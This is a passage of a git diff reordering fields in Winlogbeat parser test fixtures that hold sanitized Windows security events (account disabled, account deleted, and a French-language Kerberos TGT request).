ats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", diff --git a/Beats/winlogbeat/tests/security_event_4725.json b/Beats/winlogbeat/tests/security_event_4725.json index 31cca5f97..d3826be97 100644 --- a/Beats/winlogbeat/tests/security_event_4725.json +++ b/Beats/winlogbeat/tests/security_event_4725.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", diff --git a/Beats/winlogbeat/tests/security_event_4726.json b/Beats/winlogbeat/tests/security_event_4726.json index e147e2eb4..73c1d823c 100644 --- a/Beats/winlogbeat/tests/security_event_4726.json +++ b/Beats/winlogbeat/tests/security_event_4726.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}" + } }, "expected": { "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", diff --git a/Beats/winlogbeat/tests/security_event_4768.json b/Beats/winlogbeat/tests/security_event_4768.json index 53d650df2..c7ac196ea 100644 --- a/Beats/winlogbeat/tests/security_event_4768.json +++ b/Beats/winlogbeat/tests/security_event_4768.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de 